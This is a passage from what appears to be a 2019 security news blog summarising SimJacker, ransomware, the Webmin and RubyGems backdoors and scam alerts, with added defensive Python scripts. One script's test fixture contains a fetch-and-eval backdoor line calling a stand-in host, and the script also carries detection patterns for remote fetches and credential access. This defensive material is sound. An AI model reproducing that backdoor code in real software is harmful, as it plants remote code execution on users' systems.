Tuesday, September 17, 2019

#Beware #RedAlert: New SIM Card Flaw Lets Hackers Hijack Any Phone Just By Sending SMS

Cybersecurity researchers today revealed the existence of a new and previously undetected critical vulnerability in SIM cards that could allow remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

Dubbed "SimJacker," the vulnerability resides in a particular piece of software, called the S@T Browser (a dynamic SIM toolkit), that is embedded on most SIM cards and widely used by mobile operators in at least 30 countries; it can be exploited regardless of which handset the victim is using.

What's worrisome? A specific private company that works with governments has been actively exploiting the SimJacker vulnerability for at least the last two years to conduct targeted surveillance on mobile phone users across several countries.

S@T Browser, short for SIMalliance Toolbox Browser, is an application that comes installed on a variety of SIM cards, including eSIM, as part of SIM Tool Kit (STK) and has been designed to let mobile carriers provide some basic services, subscriptions, and value-added services over-the-air to their customers.

You can read the full article.


Lilu ransomware encrypts files on Linux systems

    Linux™ operating systems are sometimes overlooked as malware targets because of their smaller pool of victims compared to more popular operating systems; with fewer targets, attackers are incentivized to direct their efforts towards a richer hunting ground. Despite that, the lilu (or lilocked) ransomware targets solely Linux-based web servers. It has infected over 6000 servers so far and looks set to continue for the foreseeable future.

    While the ransomware primarily targets Linux web servers, there is no evidence precluding its ability to infect other Linux systems; a web server’s infected status is simply visible to web crawlers, whereas non-web-server systems would not be as publicly visible. The lilu ransomware encrypts files on the victim’s system and leaves a “#README.lilocked” file in each folder that contains encrypted files. The “#README.lilocked” file is a ransom note that directs the victim to a Tor page and supplies a key to use on that page. The key provides access to a second ransom note that directs the victim to purchase Bitcoin or Electrum to pay the ransom to decrypt the files.

    The ransom demanded has so far been inconsistent, reportedly ranging from 0.01 BTC to 0.03 BTC. So far the ransomware has only encrypted non-essential files and has left the servers running. It targets a limited set of file extensions such as HTML, SHTML, JS, CSS, PHP, and INI, along with various image file formats.

    There has not been any success in decryption efforts so far. However, one victim, going by Jay Gairson on Twitter, claims that the ransomware uses an Exim exploit and that it persists even after the system is taken offline and replaced. Exim is an open-source mail transfer agent for Unix-like operating systems. The suspected exploit is tracked as CVE-2019-15846; it has since been patched, which leads researchers to believe lilu only affects older versions of Exim. There is also no evidence yet that paying the ransom successfully decrypts one’s files, though the attacker has no incentive to build a reputation for services not rendered.


 • https://www.bleepingcomputer.com/news/security/lilocked-ransomwareactively-targeting-servers-and-web-sites/ 
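As an added example (not from the original article and not any vendor's tooling), the following Python script walks a web root looking for the “#README.lilocked” ransom note the article describes and summarizes the file extensions in each affected directory, the first-pass triage an incident responder would run before deciding what to restore. The sample directory layout is constructed inline; the extension list is the one the article gives, and the function names are my own.

```python
import os
import tempfile
from collections import Counter

# Indicators taken from the write-up: the ransom note dropped in every directory
# holding encrypted files, and the extensions the ransomware is reported to target.
RANSOM_NOTE = "#README.lilocked"
TARGETED_EXT = {".html", ".shtml", ".js", ".css", ".php", ".ini"}


def find_ransom_notes(root):
    """Return every directory under root that contains the ransom note."""
    return sorted(d for d, _subdirs, files in os.walk(root) if RANSOM_NOTE in files)


def summarize_directory(dirpath):
    """Count regular files by extension in one affected directory (the note itself excluded)."""
    counts = Counter()
    for name in os.listdir(dirpath):
        if name != RANSOM_NOTE and os.path.isfile(os.path.join(dirpath, name)):
            counts[os.path.splitext(name)[1].lower()] += 1
    return counts


def triage(root):
    """Map each affected directory (relative to root) to its extension counts and
    to how many of those files fall into the targeted-extension set."""
    report = {}
    for d in find_ransom_notes(root):
        counts = summarize_directory(d)
        report[os.path.relpath(d, root)] = {
            "by_ext": dict(counts),
            "targeted": sum(n for ext, n in counts.items() if ext in TARGETED_EXT),
        }
    return report


def build_sample_tree():
    """Constructed sample web root for offline demonstration; not data from a real incident."""
    root = tempfile.mkdtemp(prefix="lilu-demo-")
    layout = {
        "var/www/site/index.html": "<html></html>",
        "var/www/site/app.js": "console.log(1)",
        "var/www/site/#README.lilocked": "constructed ransom note",
        "var/www/site/img/logo.png": "png-bytes",
        "var/www/site/img/#README.lilocked": "constructed ransom note",
        "var/www/clean/index.php": "<?php ?>",
    }
    for rel, body in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for directory, summary in triage(build_sample_tree()).items():
        print(directory, summary)
```

Directories without the note (here `var/www/clean`) are left out of the report, which is the point: the note marks exactly the folders whose contents need to be compared against backups.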



Does Anyone Else Know Where Your Children Are

    Keeping track of your child’s whereabouts has never been easier. A quick search on Amazon shows thousands of entries for low-cost GPS trackers designed to be worn by children and linked to an app on the parent’s smartphone. However, the appeal of the low cost comes at a much larger price. Researchers from Avast found a handful of vulnerabilities in 29 models of GPS trackers made by the Chinese company Shenzhen i365. The researchers found that an attacker with an internet connection can use the GPS to track the location of the wearer, spoof the device’s location data, and even access the device’s microphone to eavesdrop on the wearer. This is because the communication between the device, the cloud, and the companion mobile app uses unencrypted HTTP. This enables a man-in-the-middle (MitM) attack, in which an attacker can listen in on the communication and alter the data being sent or received.

    In addition, the user account, which is associated with an ID number, ships with a default password of 123456. The researchers found that the ID number is not assigned randomly; it is derived from the device’s IMEI number. An IMEI number is a 15-digit identifier given to mobile and satellite phones. With this knowledge, the researchers could log into the accounts of about 25% of the devices in a sequence of IMEI numbers, which would allow them to see the real-time location of the devices on those accounts. Avast estimated that over half a million people are using GPS trackers affected by these vulnerabilities.

    Despite the manufacturer’s location in China, the researchers found that the GPS trackers were also widely used in the United States and elsewhere around the world. Avast attempted to privately contact the manufacturer about these vulnerabilities but has not received a response. A senior researcher stated that "we have done our due diligence in disclosing these vulnerabilities to the manufacturer, but since we have not heard back after the standard window of time, we are now issuing this public service announcement to consumers and strongly advise you to discontinue use of these devices." When shopping for any IoT device, it can be tempting to go with the low-cost, off-brand option, especially when the name-brand device can be so much more expensive. However, the cheaper option has often skimped on, or simply omitted, basic security measures to reduce cost. The researchers advised consumers to do their research and buy from respected vendors. These devices are designed to provide peace of mind, but in reality they make the wearer more vulnerable, not less.


 • https://thehackernews.com/2019/09/gps-tracking-device-for-kids.html 


Wednesday, September 4, 2019

Intentional Backdoor Webmin RCE Vulnerability

    When Turkish researcher Özkan Mustafa Akkuş publicly disclosed a Remote Code Execution (RCE) vulnerability in the Webmin application at DefCon this month, the Webmin developers went into emergency overdrive mode to fix the issue as quickly as possible. While the ethics of Akkuş’ disclosure without notifying the Webmin team first are certainly questionable, the vulnerability itself is severe and had been hidden for over a year. Even more alarming, further investigation by the Webmin team revealed that it was not a coding error but in fact a malicious backdoor injected into the codebase through a build server.

    Webmin is a popular open-source application for managing Unix-based systems over the web. This includes management of users and groups, databases, web servers, e-mail, firewalls, and backups: pretty much any administration of the system. The vulnerability, CVE-2019-15107, lies in the password expiration function, which allows admins to require users to set a new password at a set interval. By adding a pipe character (“|”) followed by a command to the old password field in a POST request, a remote attacker could run arbitrary commands as the root user on the system.

    The vulnerability was introduced by a malicious attacker in April 2018, who compromised a Webmin development build server and modified the password_change.cgi script. After some users reported that the password expiration feature was producing errors, the developers reverted to an older version of the file that turned the feature off by default, inadvertently removing the vulnerability. However, the attacker modified the file again in July 2018. Even though the build server was decommissioned in September 2018, the new server was built from a directory containing the modified file, so the vulnerability persisted until its DefCon reveal.

    The Webmin development team stated that version 1.890 included the vulnerability with the password expiration function enabled by default, making it the most vulnerable version. Versions 1.900 through 1.920 also include the vulnerability, but with the password expiration function disabled by default. Version 1.930 was released following the DefCon reveal and contains fixes for this vulnerability as well as for some Cross-Site Scripting (XSS) vulnerabilities. Webmin developers are taking steps to ensure this issue doesn’t happen again, including an updated build process that only uses checked-in code from GitHub, rotation of all passwords and keys, and an audit of all GitHub check-ins over the past year.
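The remediation the Webmin team describes, building only from checked-in code, can be enforced mechanically. As an added example (not Webmin's own build tooling), the following Python script computes a SHA-256 manifest of the checked-in tree, then compares a build directory against it and reports added, removed and modified files; a build step would refuse to proceed on any drift. The directory contents are constructed for the demo, `password_change.cgi` is used only as a stand-in name taken from the write-up, and the helper names are assumptions.

```python
import hashlib
import json
import os
import tempfile


def file_digest(path):
    """SHA-256 of a file, streamed so large build artifacts are handled."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_manifest(root):
    """Relative path -> sha256 for every regular file under root (VCS metadata skipped)."""
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = sorted(d for d in dirnames if d != ".git")
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = file_digest(full)
    return manifest


def compare_manifests(expected, actual):
    """Classify drift between the checked-in manifest and what the build tree holds."""
    return {
        "added": sorted(set(actual) - set(expected)),
        "removed": sorted(set(expected) - set(actual)),
        "modified": sorted(p for p in expected if p in actual and expected[p] != actual[p]),
    }


def verify_build_tree(manifest_path, build_root):
    """Drift report for build_root; a build should be refused unless all three lists are empty."""
    with open(manifest_path) as fh:
        expected = json.load(fh)
    return compare_manifests(expected, tree_manifest(build_root))


def demo():
    """Constructed scenario: a checked-in tree, a clean build copy, then a tampered build copy."""
    checkin = tempfile.mkdtemp(prefix="checkin-")
    build = tempfile.mkdtemp(prefix="build-")
    files = {"password_change.cgi": "# original handler\n", "web-lib.pl": "# shared library\n"}
    for root in (checkin, build):
        for name, body in files.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
    # The manifest is recorded from the checked-in tree and stored outside both trees.
    manifest_path = os.path.join(tempfile.mkdtemp(prefix="manifest-"), "manifest.json")
    with open(manifest_path, "w") as fh:
        json.dump(tree_manifest(checkin), fh)

    clean = verify_build_tree(manifest_path, build)
    # Tamper with the build tree the way the article describes: edit one script, drop in another.
    with open(os.path.join(build, "password_change.cgi"), "a") as fh:
        fh.write("# injected line\n")
    with open(os.path.join(build, "extra.pl"), "w") as fh:
        fh.write("# not in version control\n")
    tampered = verify_build_tree(manifest_path, build)
    return clean, tampered


if __name__ == "__main__":
    before, after = demo()
    print("clean build:", before)
    print("tampered build:", after)
```

Storing the manifest with the source control history (or deriving it from a signed tag) rather than on the build host is what makes the check meaningful: an attacker who controls the build server can rewrite a manifest that lives beside the tree.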


 • https://thehackernews.com/2019/08/webmin-vulnerability-hacking.html

 • https://www.zdnet.com/article/backdoor-found-in-webmin-a-popular-web-based-utility-for-managing-unix-servers/


The Syrk ransomware

    The Syrk ransomware, first reported by researchers at Cyren Security, disguises itself as a cheat tool for the multiplayer, Hunger Games-style video game Fortnite. It claims to provide aim assistance as well as the ability to reveal player locations. It provides none of these capabilities and instead installs an open-source ransomware, Hidden-Cry, which encrypts files with a .syrk extension.

    Hidden-Cry was shared on GitHub at the end of last year and is still openly available. The ransomware goes through a ten-step process that consists of contacting a command-and-control (CC) server, disabling common defenses, executing a payload, encrypting files with a .Syrk extension, establishing persistence, preventing termination, periodically deleting files to establish a threat, and finally propagating itself by placing malicious versions of files on connected USB drives. This particular malware is relatively benign. The decryption tool is readily available among the downloaded files and is easily extracted and used to decrypt the ransomed files. The malware also creates .txt files to be sent to the CC server so that the attacker can provide a password to the victim once the ransom is paid. It is possible for a criminal to simply send nothing once payment is rendered, but if they intend to propagate via USB drive, it is likely that the first victim would be in contact with the next, and a reputation that payment brings no benefit would only prevent further payments. What is surprising is that the ransomware creates the file with the password right on the victim's computer. It even includes a Delete.exe that removes all traces of itself from the victim's computer (not USB drives) and even removes the startup file, making good on its promise after the password is entered.

    This attack is clearly targeted at either the weak-willed or the less informed. Children are particularly susceptible to the temptation to level the playing field against older or more dexterous peers in the game. The disguise as a cheating tool already shows that the attacker intends to target those who would take shortcuts to success over the effort of getting better at the game. While the desire to win does not in itself make a vulnerable target, the lack of experience with scams and the pressure to perform despite the limitations of age combine to make a particularly vulnerable demographic. The malware itself may not be as dangerous or complex as others, but its target is particularly susceptible to such machinations.





Potential Hurricane Dorian Cyber Scams

Original release date: September 4, 2019

The Cybersecurity and Infrastructure Security Agency (CISA) warns users to remain vigilant for malicious cyber activity targeting Hurricane Dorian disaster victims and potential donors. Fraudulent emails commonly appear after major natural disasters and often contain links or attachments that direct users to malicious websites. Users should exercise caution in handling any email with a hurricane-related subject line, attachment, or hyperlink. In addition, users should be wary of social media pleas, texts, or door-to-door solicitations relating to severe weather events.

To avoid becoming victims of malicious activity, users and administrators should review the following resources and take preventative measures:

If you believe you have been a victim of cybercrime, file a complaint with the Federal Bureau of Investigation Internet Crime Complaint Center at www.ic3.gov.

Monday, August 26, 2019

SQLite Heavy Vulnerabilities

Researchers at CheckPoint unveiled a method that could allow malicious actors to exploit programs that query SQLite databases. The findings were presented at the DEFCON cybersecurity conference last weekend by Omer Gull, a vulnerability researcher at CheckPoint. The researchers found that by overwriting a non-malicious SQLite database with a specially crafted malicious one, they can achieve remote code execution. SQLite is a C-language library that implements a fully self-contained SQL database engine. It is used extensively by multiple operating systems, such as iOS and Android, and by applications such as Chrome, Firefox, Safari, and Dropbox. The researchers state that this technique allows for the exploitation of any code that queries an SQLite database the attacker can modify.

The researchers stated that the idea of an SQLite attack came from its role in command-and-control (C2) servers utilized by password-stealing malware. While reverse-engineering the malware, the researchers determined that most of them work in the same way. They state that “after the malware collects these SQLite files, it sends them to its C2 server where they are parsed using PHP and stored in a collective database containing all of the stolen credentials”. Using the specially crafted SQLite database, the researchers were able to gain a web shell on a C2 server in a lab environment by simulating the upload of a database.

In addition to exploiting a C2 server, the researchers described another scenario in which this vulnerability can be exploited. Within the iOS operating system, the “AddressBook.sqlitedb” file is one of the most common database files. It is used for contact storage and is often referenced by both Apple apps and third-party messaging apps. By replacing this file with a malicious version, the researchers say they can gain code execution. Persistence on iOS devices is normally difficult to achieve because of Apple’s Secure Boot feature, which mandates that all executable files be signed. However, SQLite database files are not signed, which allows them to be modified.

While the researchers privately disclosed the vulnerabilities (CVE-2019-8600, CVE-2019-8598, CVE-2019-8602, CVE-2019-8577), which were then patched in the latest SQLite version along with the latest iOS version (iOS 12.3), they said there are numerous other scenarios where this vulnerability can be exploited. “SQLite is one of the most deployed software in the world. However, from a security perspective, it has only been examined through the lens of WebSQL and browser exploitation,” said Omer Gull. SQLite attack scenarios should be considered a “major cyberthreat.” As always, keeping programs and operating systems up to date with the latest patches is one of the best ways to prevent the exploitation of these vulnerabilities.
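Because SQLite files are not signed, an application that opens a database it does not fully control can verify the file itself before handing it to the parser. As an added example (not CheckPoint's research code and not part of SQLite), the following Python script attaches an HMAC-SHA256 tag to a database file, refuses to open the file unless the tag verifies, and only then runs SQLite's own `PRAGMA integrity_check`. The key, the table, the contact row and the file name are constructed for the demo; the `.sig` sidecar convention and the helper names are assumptions.

```python
import hashlib
import hmac
import os
import sqlite3
import tempfile

# Constructed demo key. In a deployment the key lives in a key store or the
# app's secure storage, never beside the database it protects.
DEMO_KEY = b"constructed-demo-key-do-not-use"


def sign_db(path, key):
    """Write an HMAC-SHA256 tag over the whole file to a .sig sidecar (assumed convention)."""
    with open(path, "rb") as fh:
        tag = hmac.new(key, fh.read(), hashlib.sha256).hexdigest()
    with open(path + ".sig", "w") as fh:
        fh.write(tag)
    return tag


def verify_db(path, key):
    """True only if the stored tag matches the file's current content (constant-time compare)."""
    try:
        with open(path + ".sig") as fh:
            stored = fh.read().strip()
    except FileNotFoundError:
        return False
    with open(path, "rb") as fh:
        expected = hmac.new(key, fh.read(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(stored, expected)


def open_verified(path, key):
    """Refuse to give the SQLite parser an unverified file; then run integrity_check read-only."""
    if not verify_db(path, key):
        raise ValueError("database failed signature verification; refusing to open")
    conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    status = conn.execute("PRAGMA integrity_check").fetchone()[0]
    if status != "ok":
        conn.close()
        raise ValueError(f"integrity_check reported: {status}")
    return conn


def demo():
    """Constructed scenario: sign a database, read it, then tamper with it and retry."""
    workdir = tempfile.mkdtemp(prefix="sqlite-demo-")
    path = os.path.join(workdir, "AddressBook.sqlitedb")  # stand-in name from the write-up
    conn = sqlite3.connect(path)
    conn.execute("CREATE TABLE contacts (name TEXT, phone TEXT)")
    conn.execute("INSERT INTO contacts VALUES ('Alice', '555-0100')")  # constructed row
    conn.commit()
    conn.close()
    sign_db(path, DEMO_KEY)

    conn = open_verified(path, DEMO_KEY)
    rows = conn.execute("SELECT name FROM contacts").fetchall()
    conn.close()

    # Simulate the file being replaced or edited by an untrusted party.
    with open(path, "ab") as fh:
        fh.write(b"\x00" * 16)
    try:
        open_verified(path, DEMO_KEY)
        refused = False
    except ValueError:
        refused = True
    return {"rows": rows, "refused_after_tamper": refused}


if __name__ == "__main__":
    print(demo())
```

The order matters: the HMAC check runs over raw bytes before any SQLite code touches the file, so a crafted database never reaches the parser whose bugs the research targets; `integrity_check` is a second, weaker line of defence for corruption rather than malice.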




VxWorks Operating System: Critical Vulnerabilities Found in Millions of Devices

    The Armis research team recently revealed 11 vulnerabilities, ranging from denial of service to remote code execution, affecting the VxWorks operating system. VxWorks is a real-time operating system used in millions of embedded devices, from consumer electronics to medical devices. The vulnerabilities discovered bypass most forms of security and can even be used against the devices designed to secure the infrastructure, if they run VxWorks.

    The most critical vulnerabilities found allow for remote code execution on the target devices. Five of the critical vulnerabilities require no interaction on the target system and are exploitable no matter how the device is configured. The sixth requires the VxWorks internal DHCP client to parse a specially crafted response to an IP address allocation request. While this may seem like a difficult attack scenario, DHCP requires no authentication during these requests, so an attacker can simply listen on the network until a request is made and then send a spoofed malicious response before the real server does. These vulnerabilities could allow for full takeover of a target network that uses VxWorks-based firewalls, making them especially dangerous.

    Besides the critical vulnerabilities, there were also five lower-impact, but still significant, vulnerabilities found. One of them allows for a complete denial of service that can be triggered by an attacker outside of the network. The other denial-of-service vulnerabilities discovered require the attacker to be in network proximity to the vulnerable device but can still prevent it from functioning if triggered.

    Armis describes three attack scenarios in their release document. In the first, the attacker is outside the target network; VxWorks is used in a number of firewall devices, which are directly exploitable because they handle all network traffic. The second scenario is similar to the first in that the attacker is outside the network but is able to attack devices inside the network that can be reached from the outside. In the third scenario the attacker is positioned inside the network, such as on Wi-Fi or a guest network.

    VxWorks is sold and supported by Wind River, which was notified about the vulnerabilities. Wind River has posted a security advisory covering the vulnerabilities and updates for affected customers. It is critical that affected devices are patched as soon as updates for them are available to prevent exploitation of these flaws.


IRS Warns of New Email Scam

The Internal Revenue Service (IRS) has issued a warning about a new email scam in which malicious cyber actors send unsolicited emails to taxpayers from fake (i.e., spoofed) IRS email addresses. The emails contain a link to a spoofed IRS.gov website that displays fake details about the targeted recipient’s tax refund, return, or account. The emails instruct the recipient to access their refund information by entering a provided password on the spoofed website. By entering the password, the victim unintentionally downloads malware that could enable the malicious cyber actors to take control of the affected system or obtain sensitive information.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the IRS news release and the CISA Tip on Avoiding Social Engineering and Phishing Attacks for more information.

Rubys in the Rough

    The Ruby programming language is a high-level, general-purpose programming language developed with a focus on object orientation at a time when object-oriented options were few and its creator found them lacking. The language uses a package manager called RubyGems to provide a standardized platform for managing programs and libraries.

    Thousands of users are potentially affected by vulnerabilities in 18 versions of Ruby libraries. The vulnerabilities included code that launched crypto miners inside other Ruby projects. Other features of the compromised libraries included the collection and delivery of data, including credentials, payment and service-provider details, and entire databases, to a server in Ukraine. The backdoor gave an attacker a way to send cookies through this vulnerability and to remotely execute code and commands. The code was inserted into several different crypto-mining libraries as well as a few utilities like omniauth_amazon and cron_parser. These are all relatively small packages, but when the malicious actor tried to push the updates onto rest-client, a much more widely used and scrutinized project, the backdoor was identified within hours, and the other projects where it had been inserted were also discovered.

    Because of the quick identification, there were only around a thousand downloads of the latest update for this older version of rest-client. However, the smaller libraries had this attack in place for over a month. Thankfully, the total downloads for all of those libraries combined numbered less than 3000. We last saw such dependency attacks in the strong_password library, which downloaded a payload from pastebin.com instead of holding malicious code itself.

    With crowd-sourced and open-source projects, one must take extra precautions and properly evaluate the diffs between updates before committing to such a solution. Without due diligence, one could find oneself unknowingly inserting bad code into one’s projects or relying on bad dependencies that could compromise both developer data and user data in one’s products and projects. Relying on descriptions and on faith that a widely used gem is safe is a disservice to you as well as a disservice to the community at large.
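The advice to evaluate the diffs between updates can be partly automated. As an added example (not part of RubyGems or of any gem mentioned above), the following Python script extracts only the lines an update adds and flags those matching a small set of heuristic patterns: dynamic eval, remote fetches, decoded payloads, process spawning and credential access, which together describe the fetch-and-eval behaviour the write-up attributes to strong_password. The before/after gem sources, the pattern list and the example URL are constructed for the demo; the patterns are illustrative, not an exhaustive rule set.

```python
import difflib
import re

# Heuristic patterns a reviewer wants surfaced in lines ADDED by an update.
# Constructed for this example; real tooling would maintain a far longer list.
RISKY = {
    "eval_of_dynamic_code": re.compile(r"\beval\s*\(|\binstance_eval\b|\bclass_eval\b"),
    "remote_fetch": re.compile(r"Net::HTTP|open-uri|URI\.open|pastebin\.com", re.I),
    "encoded_payload": re.compile(r'Base64\.(decode64|strict_decode64)|\.unpack\("m'),
    "process_spawn": re.compile(r"\bsystem\s*\(|`[^`]+`|%x\(|Process\.spawn|IO\.popen"),
    "env_or_credentials": re.compile(r"ENV\[|password|secret|token", re.I),
}


def added_lines(old_src, new_src):
    """Lines present only in the new version: the '+' lines of a unified diff, headers excluded."""
    diff = difflib.unified_diff(old_src.splitlines(), new_src.splitlines(), lineterm="", n=0)
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]


def review_update(old_src, new_src):
    """Return [(added_line, [matching categories])] for every added line that trips a pattern."""
    findings = []
    for line in added_lines(old_src, new_src):
        categories = [name for name, rx in RISKY.items() if rx.search(line)]
        if categories:
            findings.append((line.strip(), categories))
    return findings


# Constructed sample: a harmless utility gem before and after a suspicious update.
OLD_VERSION = """\
module CronParser
  def self.parse(expr)
    expr.split(" ")
  end
end
"""

NEW_VERSION = """\
require "net/http"
require "base64"
module CronParser
  def self.parse(expr)
    expr.split(" ")
  end
  def self.update_check
    payload = Net::HTTP.get(URI("https://updates.example/raw/abc"))
    eval(Base64.decode64(payload))
  end
end
"""


if __name__ == "__main__":
    for line, categories in review_update(OLD_VERSION, NEW_VERSION):
        print(f"{', '.join(categories):40s} {line}")
```

Looking only at added lines keeps the output proportional to the size of the update rather than the size of the gem, which is what makes the check cheap enough to run on every version bump; a clean run means nothing more than that none of these particular patterns appeared.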



Mistake: Apple Accidentally Un-Patches Old Flaw

    Apple accidentally re-introduced into iOS 12.4 a vulnerability that had been patched in iOS 12.3. This led to the release of a jailbreak for iOS 12.4 from security researcher Pwn20wnd called “unc0ver 3.5.0,” the first jailbreak to be released for up-to-date iPhones in years. This is significant because, according to an article from Motherboard, iPhone bugs are so valuable that they are often not reported to Apple at all, and jailbreak exploits are often sold for large amounts of money. For example, the FBI paid over $1.2 million for a vulnerability that allowed them to gain access to an iPhone 5c used by San Bernardino shooter Syed Farook.

    Another reason security researchers might be unwilling to report bugs to Apple is that Apple doesn’t offer a strong enough incentive. After declining to offer a bug bounty program for some time, Apple announced its bug bounty program in 2016. Rewards range from $25,000 for “Access from a sandboxed process to user data outside of that sandbox process” to $200,000 for “Secure boot firmware components.” While this may sound like a lot of money, it is nothing compared to what companies like Zerodium and Exodus offer for similar exploits. Zerodium has offered up to $1.5 million for exploits that would allow jailbreaks, and Exodus has offered up to $500,000 for similar exploits. Alternatively, some researchers don’t report bugs to Apple because the patching of those bugs would interfere with their ability to do further research. According to Luca Todesco, a well-known figure in the iPhone jailbreak community, “Either you report and kill your own bugs, or you decide not to report the bug so that you don’t complicate your own life and you can keep doing research.”

    The vulnerability used in this jailbreak was discovered by Ned Williamson, who works for Google Project Zero. The bug, CVE-2019-8605, could allow a malicious application to “execute arbitrary code with system privileges.” According to The Hacker News, “besides embedding the exploit into an innocent-looking app, the vulnerability can also be exploited remotely by combining it with sandbox bypass flaws in Apple Safari web browser or other Internet exposed services.” Even with this vulnerability, remotely hacking an iPhone is still a difficult task. However, it is substantially less difficult while this bug still exists on iPhones.




Tuesday, August 6, 2019

This is a Great Article by the Knowbe4 Company

Knowbe4 is a great solution for companies to train users on social engineering issues.
Here is a great example of the content that they deliver to their base.

Scam of the Week: Equifax Settlement Phishing

Well, that did not take long! The Equifax Data Breach resulted in a settlement and those affected have a choice between free credit monitoring or a $125 payment. Internet lowlifes are now targeting victims of the Equifax data breach with phishing attacks and are spoofing Equifax’s settlement page.

Your users should report these as malicious emails. If they fall for it and click on the link, they are likely winding up on a spoofed site that looks very similar to the existing Equifax settlement page.

There, they are going to be exposed to a social engineering scam, trying to steal as much data as possible.

I suggest you send the following to your employees, friends and family. You're welcome to copy/paste/edit:


ALERT: Internet bad guys are now trying to trick you into filing an Equifax claim and get a $125 payment because your personal data was in the Equifax data breach. They are sending phishing attacks that look like they come from Equifax and when you click on the links, you wind up on a fake website that looks like it's Equifax, but will try to steal your personal information. Don't fall for it.

If you want to file a claim, go to the legit FTC website and click on the blue "File a Claim" button. The website will check your eligibility for that claim; not everyone's information was compromised.

Go to their blog at https://blog.knowbe4.com/ and also explore the free tools on their site https://www.knowbe4.com/free-it-security-tools

More examples of Speed to market not Secure First

    New technology often saturates a market before fully ripening to prime usefulness. The race to be first to market is often seen in recognized household names like Alexa, Blackberry, or even the Oculus Rift. While they might not always be the best at what they do, familiarity can smooth over many of the kinks in the products they produce.

    The Hickory Smart Bluetooth Enabled Deadbolt allows its user to manage their home security remotely and to have the assurance that the door is locked in case they are concerned that they forgot to lock it when they left the house. While this function seems useful to a potential customer, the product has had 6 vulnerabilities uncovered by Rapid7 security researchers. One of the most concerning is cleartext credential transmission from the Hickory Smart Ethernet Bridge device; it is something I would expect even the least security-minded designer to avoid.

    The rest of the data is encrypted, and it would be difficult to translate the credentials into actionable information regarding the deadbolt, but if the user had changed the credentials from the defaults and an adversary were able to obtain them, they could be included in future credential stuffing attacks against the user. The Amcrest IP2M-841B IP camera is a rebranded Dahua camera, and Dahua has a history of security issues. It has a bug that allows anyone to connect to the camera over HTTP and decode the audio output for their listening pleasure.

    The camera wraps transmissions in a DHAV container, but it is trivial to decipher and play in VLC. In their haste to provide a product, they seem to be keeping these products at different patch levels, exposing users to security issues that may already have been patched elsewhere. As Amcrest is one of many companies selling rebranded Dahua products, it is unknown how many products are vulnerable to this bug.

    While the focus on being first to market with a technology may establish a foothold in the homes of consumers, it also makes the customers they seek to serve vulnerable to any cybersecurity risks that were left on the cutting room floor in the rush to get the product out the door. Testing and security are becoming ever more challenging by the day, and each year we find our old standards insufficient. The effort to gain access to an unlocked door or bugged camera might not be cost-efficient for the average person at scale, but it easily puts higher-value targets at risk, and simply not being a target is no excuse to support these practices.


El Paso and Dayton Tragedy-Related Scams and Malware Campaigns

In the wake of the recent shootings in El Paso, TX, and Dayton, OH, the Cybersecurity and Infrastructure Security Agency (CISA) advises users to watch out for possible malicious cyber activity seeking to capitalize on these tragic events. Users should exercise caution in handling emails related to the shootings, even if they appear to originate from trusted sources. Fraudulent emails often contain links or attachments that direct users to phishing or malware-infected websites. Emails requesting donations from duplicitous charitable organizations are also common after tragic events. Be wary of fraudulent social media pleas, calls, texts, donation websites, and door-to-door solicitations relating to these events.

To avoid becoming a victim of malicious activity, users and administrators should consider taking the following preventive measures:

Friday, August 2, 2019

NIST Publishes Multifactor Authentication Practice Guide

The National Institute of Standards and Technology (NIST) National Cybersecurity Center of Excellence (NCCoE) has published NIST Cybersecurity Practice Guide: Multifactor Authentication for E-Commerce. The guide provides e-commerce organizations multifactor authentication (MFA) protection methods they can implement to reduce fraudulent purchases.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages e-commerce organizations to download the guide to learn how to prevent e-commerce fraud using MFA solutions.

Cylance Antivirus Vulnerability

Original release date: August 2, 2019

The CERT Coordination Center (CERT/CC) has released information on a vulnerability affecting Cylance Antivirus products. A remote attacker could exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review CERT/CC Vulnerability Note VU#489481 and the Cylance Resolution for BlackBerry Cylance Bypass webpage for patch information and additional recommended workarounds.

Tuesday, July 30, 2019

Steps to Safeguard Against Ransomware Attacks

Original release date: July 30, 2019

The Cybersecurity and Infrastructure Security Agency (CISA), Multi-State Information Sharing & Analysis Center (MS-ISAC), National Governors Association (NGA), and the National Association of State Chief Information Officers (NASCIO) have released a Joint Ransomware Statement with recommendations for state and local governments to build resilience against ransomware:

  1. Back up systems—now (and daily). Immediately and regularly back up all critical agency and system configuration information on a separate device and store the backups offline, verifying their integrity and restoration process. If recovering after an attack, restore a stronger system than the one lost, fully patched and updated to the latest version.
  2. Reinforce basic cybersecurity awareness and education. Ransomware attacks often require the human element to succeed. Refresh employee training on recognizing cyber threats, phishing, and suspicious links—the most common vectors for ransomware attacks. Remind employees of how to report incidents to appropriate IT staff in a timely manner, which should include out-of-band communication paths.
  3. Revisit and refine cyber incident response plans. Have a clear plan to address attacks when they occur, including when internal capabilities are overwhelmed. Make sure response plans include how to request assistance from external cyber first responders, such as state agencies, CISA, and MS-ISAC, in the event of an attack.

CISA encourages organizations to review the Joint Ransomware Statement and the following ransomware guidance:

Friday, July 19, 2019

Spearphone: an attack on Android Phones

    A team of cybersecurity researchers - Abhishek Anand, Chen Wang, Jian Liu, Nitesh Saxena, and Yingying Chen - have discovered and demonstrated a new side-channel attack that could potentially allow apps to listen in on the voice coming through an Android phone’s loudspeakers without requiring any device permissions.

    This new attack has been named Spearphone. It works by taking advantage of the accelerometer built into most Android phones. An accelerometer is a sensor that detects and monitors movement of the phone, such as being shaken, tilted, or lifted up. The accelerometer can be read by any app without requesting any permissions.

